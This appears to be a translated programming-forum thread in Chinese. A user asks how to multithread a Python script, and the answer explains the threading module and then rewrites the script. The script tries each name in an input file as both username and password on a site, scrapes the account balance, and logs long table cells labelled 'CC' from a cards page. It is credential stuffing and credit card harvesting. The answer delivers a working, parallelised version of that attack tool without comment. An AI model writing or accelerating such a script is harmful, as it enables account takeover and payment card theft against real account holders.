我尝试用多线程(multithreading)改写这个脚本,但没有成功。我是 Python 新手,有人可以帮助我吗?这个脚本可以正常工作,但速度太慢。
import mechanize
from bs4 import BeautifulSoup as BS
# File read by the main loop, and file that receives the report.
entrada = "entrada.txt"
saida = "saida.txt"


def escreve(texto):
    """Append ``texto`` to the file named by ``saida``.

    The file is opened in append mode and closed again on every call.
    """
    with open(saida, "a") as relatorio:
        relatorio.write(texto)
# Sequential version: for every line of the input file, log in using that
# line as both user name and password, report the balance link and every
# long table cell, and append the same text to the output file.
with open(entrada) as fp:
    for user in fp:
        try:
            user = user.rstrip()
            # Running number of the next card entry for this account.
            cont = 1
            br = mechanize.Browser()
            br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
            # NOTE: ``ua`` is assigned but never handed to the browser.
            ua = 'Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 (compatible;)'
            br.set_handle_robots(False)
            br.open("https://site")
            # Fill in and submit the first form on the page.
            br.select_form(nr=0)
            br['username'] = user
            br['password'] = user
            response = br.submit()
            soup = BS(br.response().read(), 'lxml')
            value = soup.find_all('a')
            # The third link on the page is reported as the balance; an
            # IndexError here (fewer than three links) lands in the handler
            # below and is reported as a failed login.
            txt = "\nConta - Saldo[" + value[2].text + "]\n"
            # Single-argument print(...) behaves the same on Python 2 and 3.
            print(txt)
            escreve(txt)
            response = br.open("https://test/sub/")
            soup2 = BS(br.response().read(), 'lxml')
            txt = "Procurando por cartoes na conta"
            print(txt)
            escreve(txt)
            for tds in soup2.find_all('td'):
                # Only cells with more than 30 characters are reported.
                if len(tds.text) > 30:
                    cc = "CC[" + str(cont) + "] ~> " + tds.text + "\n"
                    print(cc)
                    escreve(cc)
                    cont += 1
            # ``cont`` is one past the last entry, hence the ``- 1``.
            txt = "\nTotal [" + str(cont - 1) + "]\n-------------------------------------------------\n"
            escreve(txt)
        except Exception:
            # Best effort: any failure for this user is logged and the loop
            # moves on to the next one.
            erro = "\n[!]Erro ao logar[" + user + "]\n-------------------------------------------------\n"
            escreve(erro)
            print(erro)
此脚本会登录并抓取一些信息。代码工作正常,但速度太慢。提前感谢!
正如 bmcculley 所提到的,你可以参考这个问题,也可以查阅官方文档。
如何多线程
Python 中的多线程可以通过 threading 模块实现。针对您的情况,您需要了解如何创建线程、如何加锁,以及如何联接(join)线程。
创建线程
要创建线程,您需要为线程定义一个类。该类需要继承 threading.Thread。
import threading
class MyThread(threading.Thread):
    """Minimal thread skeleton: the work to run concurrently goes in run()."""

    def __init__(self):
        threading.Thread.__init__(self)

    def run(self):
        # Your code here
        # ``pass`` keeps the skeleton valid Python until real code replaces it.
        pass
您也可以像普通类一样添加参数。
运行线程
为线程创建类后,可以创建线程:
# Create the thread object; run() is not executed until start() is called.
thread = MyThread()
并运行它:
# start() launches the new thread, which then calls run().
thread.start()
锁定多个线程
锁定线程可防止线程同时使用资源。这是您的案例所必需的,因为您的线程将写入saida.txt
并打印到标准输出。
假设您有一个线程WriteThread
将一些文本写入文件:
import threading
class WriteThread(threading.Thread):
    """Thread that writes one piece of text to an already-open file object.

    Args:
        text: The string to write.
        output: An object with a ``write`` method, e.g. an open file.
    """

    def __init__(self, text, output):
        threading.Thread.__init__(self)
        self.text = text
        self.output = output

    def run(self):
        # The values live on the instance; the bare names ``output`` and
        # ``text`` do not exist in this scope and would raise NameError.
        self.output.write(self.text)
with open("output.txt", "a+") as f:
    # Create threads
    thread_a = WriteThread("foo", f)
    thread_b = WriteThread("bar", f)
    # Start threads
    thread_a.start()
    thread_b.start()
    # Wait for both threads before leaving the block: leaving it closes the
    # file, and a thread that has not written yet would then fail.
    thread_a.join()
    thread_b.join()
该程序可能仍然可以工作,但允许它们同时访问同一文件不是一个好主意。相反,当thread_a
写入文件时,将使用锁来防止thread_b
写入文件。
import threading
# Shared by every WriteThread so that only one of them writes at a time.
file_lock = threading.Lock()


class WriteThread(threading.Thread):
    """Thread that writes one piece of text to a file while holding file_lock.

    Args:
        text: The string to write.
        output: An object with a ``write`` method, e.g. an open file.
    """

    def __init__(self, text, output):
        threading.Thread.__init__(self)
        self.text = text
        self.output = output

    def run(self):
        # Acquire Lock
        file_lock.acquire()
        try:
            # Use the instance attributes; the bare names ``output`` and
            # ``text`` are undefined here and would raise NameError.
            self.output.write(self.text)
        finally:
            # Release Lock -- even if the write fails, otherwise every other
            # thread waiting on file_lock would block forever.
            file_lock.release()
with open("output.txt", "a+") as f:
    # Create threads
    a = WriteThread("foo", f)
    b = WriteThread("bar", f)
    # Start threads
    a.start()
    b.start()
    # Wait for both threads before leaving the block: leaving it closes the
    # file, and a thread that has not written yet would then fail.
    a.join()
    b.join()
file_lock.acquire() 的意思是:当前线程会一直等待,直到持有锁的另一个线程调用 file_lock.release() 释放 file_lock,之后它才可以使用该文件。
联接多个线程
联接线程是一种将所有线程同步在一起的方法。当多个线程联接时,它们需要等到所有线程都完成才能继续。
假设我有两个线程具有不同的代码执行时间,我希望它们在继续之前完成它们正在执行的任何操作。
import threading
import time
class WaitThread(threading.Thread):
    """Thread that sleeps for a given time and then prints a message.

    Args:
        time_to_wait: Number of seconds to sleep before printing.
        text: The message to print once the sleep is over.
    """

    def __init__(self, time_to_wait, text):
        threading.Thread.__init__(self)
        self.time_to_wait = time_to_wait
        self.text = text

    def run(self):
        # Wait!
        time.sleep(self.time_to_wait)
        # Single-argument print(...) behaves the same on Python 2 and 3,
        # whereas the bare ``print x`` statement is a SyntaxError on Python 3.
        print(self.text)
# Thread will wait for 1 second before it finishes
thread_a = WaitThread(1, "Thread a has ended!")
# Thread will wait for 2 seconds before it finishes
thread_b = WaitThread(2, "Thread b has ended!")
threads = [thread_a, thread_b]
# Start threads
for t in threads:
    t.start()
# Join threads: block here until every thread in the list has finished
for t in threads:
    t.join()
# Single-argument print(...) behaves the same on Python 2 and 3.
print("Both threads have ended!")
在此示例中,thread_a 会先打印自己的消息,随后 thread_b 再打印。但是,只有在 thread_a 和 thread_b 都打印完毕(即两个线程都已结束)之后,程序才会执行最后一条 print 语句,输出 "Both threads have ended!"。
应用
现在,回到你的代码。
除了实现多线程、锁定和连接之外,我还做了不少更改,但整个想法是有两个锁(一个用于打印,一个用于写入文件)并在一定的限制内执行它们。(线程太多不好!参考这个问题)
import mechanize
from bs4 import BeautifulSoup as BS
import threading
# Max no. of threads allowed to be alive.
limit = 10
# File the user names are read from, and file the report is appended to.
entrada = "entrada.txt"
saida = "saida.txt"


def write(text):
    """Append ``text`` to the file named by ``saida``.

    The file is opened in append mode and closed again on every call.
    """
    with open(saida, "a") as report:
        report.write(text)
# Threading locks
fileLock = threading.Lock()   # held while a thread appends to the output file
printLock = threading.Lock()  # held while a thread prints


def print_out(text):
    """Print ``text`` while holding ``printLock``.

    The lock is taken with a ``with`` statement so it is released even when
    printing raises (for example an encoding error on scraped text). With a
    bare acquire()/release() pair such an error would leave the lock held and
    block every other thread that tries to print.
    """
    with printLock:
        # Single-argument print(...) behaves the same on Python 2 and 3.
        print(text)
# Thread for each user
class UserThread(threading.Thread):
    """Log in as one user, scrape the account pages and record the result.

    Everything found for the user is printed as it is discovered and also
    collected in one string, which is appended to the output file in a
    single write at the end so that reports of different users do not
    interleave.

    Args:
        user: One line of the input file; trailing whitespace is stripped.
            The value is used as both user name and password.
    """

    def __init__(self, user):
        threading.Thread.__init__(self)
        self.user = user.rstrip()

    def run(self):
        to_file = ""
        try:
            # Running number of the next card entry for this account.
            cont = 1
            # Initialize Mechanize
            br = mechanize.Browser()
            br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
            br.set_handle_robots(False)
            br.open("https://site")
            # Submit form
            br.select_form(nr=0)
            br["username"] = self.user
            br["password"] = self.user
            br.submit()
            # Soup Response
            soup = BS(br.response().read(), "lxml")
            value = soup.find_all("a")
            # The third link on the page is reported as the balance; an
            # IndexError here (fewer than three links) lands in the handler
            # below and is reported as a failed login.
            txt = "\nConta - Saldo[" + value[2].text + "]\n"
            print_out(txt)
            to_file += txt
            # Retrieve response from another page
            br.open("https://test/sub")
            soup = BS(br.response().read(), "lxml")
            txt = "Procurando por cartoes na conta"
            print_out(txt)
            to_file += txt
            for tds in soup.find_all("td"):
                # Only cells with more than 30 characters are reported.
                if len(tds.text) > 30:
                    cc = "CC[" + str(cont) + "] ~> " + tds.text + "\n"
                    print_out(cc)
                    to_file += cc
                    cont += 1
            # ``cont`` is one past the last entry, hence the ``- 1``.
            txt = "\nTotal [" + str(cont - 1) + "]\n-------------------------------------------------\n"
            to_file += txt
        except Exception:
            # Best effort: any failure for this user is recorded (after
            # whatever was already collected) instead of killing the thread.
            erro = "\n[!]Erro ao logar[" + self.user + "]\n-------------------------------------------------\n"
            to_file += erro
            print_out(erro)
        # Write everything to file. The ``with`` statement releases the lock
        # even if the write fails, so other threads are never left blocked.
        with fileLock:
            write(to_file)
# One thread object per line of the input file; nothing is started yet.
with open(entrada) as fp:
    threads = [UserThread(user) for user in fp]

# Run the threads in batches of at most ``limit``.
active_threads = []
for thread in threads:
    if len(active_threads) >= limit:
        # The batch is full: wait for everything to complete before moving
        # to the next set.
        for t in active_threads:
            t.join()
        active_threads = []
    # Start the current thread in every case. Starting it only in the
    # "batch not full" branch would silently skip the thread that triggered
    # the wait.
    thread.start()
    active_threads.append(thread)

# Wait for the last (possibly partial) batch.
for t in active_threads:
    t.join()
小编辑:
将所有单引号更改为双引号
在运算符之间以及其他需要的地方增加了空格
删除了未使用的变量ua
将未使用的变量response = br.submit()
和response = br.open("https://test/sub")
替换为br.submit()
和br.open("https://test/sub")